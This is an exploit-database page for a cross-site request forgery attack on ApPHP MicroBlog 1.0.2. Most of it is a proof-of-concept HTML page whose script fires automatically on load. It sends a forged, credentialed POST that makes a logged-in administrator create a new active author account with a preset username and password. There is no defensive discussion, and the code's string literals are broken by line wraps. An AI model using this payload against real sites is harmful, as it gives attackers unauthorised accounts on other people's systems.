Home / os / winmobile

ApPHP MicroBlog 1.0.2 Cross Site Request Forgery

Posted on 13 October 2016

# Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
# Author : Besim
# Google Dork :
# Date : 12/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : -
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162

########################### CSRF PoC ###############################

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "
http://site_name/path/index.php?admin=authors_management", true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---------------------------25472311920733601781889948655");
xhr.withCredentials = true;
var body =
"-----------------------------25472311920733601781889948655
" +
"Content-Disposition: form-data; name="mg_action"
" +
"
" +
"create
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_rid"
" +
"
" +
"-1
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_sorting_fields"
"
+
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_sorting_types"
" +
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_page"
" +
"
" +
"1
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_operation"
" +
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_operation_type"
"
+
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_operation_field"
"
+
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_search_status"
" +
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="mg_language_id"
" +
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="show_about_me"
" +
"
" +
"0
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="account_type"
" +
"
" +
"author
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="last_login"
" +
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="first_name"
" +
"
" +
"Mehmet
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="last_name"
" +
"
" +
"mersin
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="email"
" +
"
" +
"mehmet@yopmail.com
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="user_name"
" +
"
" +
"Zer0
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="password"
" +
"
" +
"mehmet
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="avatar";
filename=""
" +
"Content-Type: application/octet-stream
" +
"
" +
"
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="about_me"
" +
"
" +
"denemddendemdendjendk
" +
"-----------------------------25472311920733601781889948655
"
+
"Content-Disposition: form-data; name="is_active"
" +
"
" +
"1
" +

"-----------------------------25472311920733601781889948655--
";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>

####################################################################

 

TOP

Malware :

Exploits :